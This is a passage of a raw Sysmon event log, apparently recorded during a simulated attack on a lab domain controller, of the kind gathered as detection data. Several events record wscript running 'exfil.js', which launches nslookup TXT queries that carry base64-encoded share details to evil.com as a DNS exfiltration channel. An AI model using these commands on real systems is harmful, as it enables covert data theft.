10341000x8000000000000000206336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9142-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-18E0-629A-6742-000000005F02}3976216C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-9142-000000005F02}2404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.452{2E1864BB-18E4-629A-9142-000000005F02}2404C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxgck.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.448{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrnyb.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-18E4-629A-8F42-000000005F02}53807744C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9042-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9042-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.417{2E1864BB-18E4-629A-8E42-000000005F02}59085700C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9042-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.424{2E1864BB-18E4-629A-9042-000000005F02}2604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-8E42-000000005F02}5908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrnyb.tmp 2>&1 10341000x8000000000000000206320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.401{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8F42-000000005F02}5380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.401{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-8F42-000000005F02}5380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.401{2E1864BB-18E4-629A-8F42-000000005F02}53807744C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8E42-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8F42-000000005F02}5380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-8E42-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-18E0-629A-6742-000000005F02}39762652C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-8E42-000000005F02}5908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.389{2E1864BB-18E4-629A-8E42-000000005F02}5908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrnyb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.385{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrjxaw.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-18E4-629A-8C42-000000005F02}76606448C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-8D42-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.348{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 